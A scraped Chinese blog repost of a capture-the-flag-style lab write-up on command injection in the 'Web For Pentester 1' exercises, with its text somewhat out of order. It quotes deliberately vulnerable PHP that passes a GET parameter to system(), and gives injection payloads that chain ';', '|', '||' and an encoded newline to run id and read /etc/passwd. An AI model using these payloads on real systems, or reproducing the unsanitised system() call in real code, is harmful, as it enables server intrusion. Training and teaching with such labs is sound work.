Web For Pentester1 - Commands injection
2021-01-30 18:15
标签:isp com 匹配 inf Once pen test load 格式 Example 1 源码: 解释:ip 参数无任何过滤,因此可以使用:;| ||来进行执行恶意命令 payload: ip=127.0.0.1|id ip=192.1681.1.1||id ip=127.0.0.1;id Example 2 源码: 解释: 这一关使用了 preg_match 正则检测我们输入的 ip ,如果 ip 不是 IP 格式的话就直接终止函数运行,但是这里使用了 payload: ip=127.0.0.1%0Aid ip=127.0.0.1%0Acat%20/etc/passwd Example 3 源码: 解释: preg_match 去掉了 /m 多行匹配模式,检测到 ip 不是 IP 地址格式的话,就重定向为: payload: ip=127.0.0.1;id OVER! Web For Pentester1 - Commands injection 标签:isp com 匹配 inf Once pen test load 格式 原文地址:https://www.cnblogs.com/hack404/p/13194251.html
system("ping -c 2 ".$_GET[‘ip‘]);
?>
符号
说明
A;B
A 不论正确与否都会执行 B 命令
A&B
A 后台运行,A 和 B 同时执行
A&&B
A 执行成功时候才会执行 B 命令
A|B
A 执行的输出结果,作为 B 命令的参数,A 不论正确与否都会执行 B 命令
A||B
A 执行失败后才会执行 B 命令
if (!(preg_match(‘/^\d{1,3}\.\d{1,3}\.\d{1,3}.\d{1,3}$/m‘, $_GET[‘ip‘]))) {
die("Invalid IP address");
}
system("ping -c 2 ".$_GET[‘ip‘]);
?>/m 多行匹配模式,所以我们这里可以使用 %0a 换行
if (!(preg_match(‘/^\d{1,3}\.\d{1,3}\.\d{1,3}.\d{1,3}$/‘, $_GET[‘ip‘]))) {
header("Location: example3.php?ip=127.0.0.1");
}
system("ping -c 2 ".$_GET[‘ip‘]);
?>
/commandexec/example3.php?ip=127.0.0.1
虽然重定向了,但是实际上代码还是执行了我们的输入,只是重定向后刷新了一下,我们没有看到执行结果:
ip=127.0.0.1|id
ip=233||id
文章标题:Web For Pentester1 - Commands injection
文章链接:http://soscw.com/index.php/essay/49179.html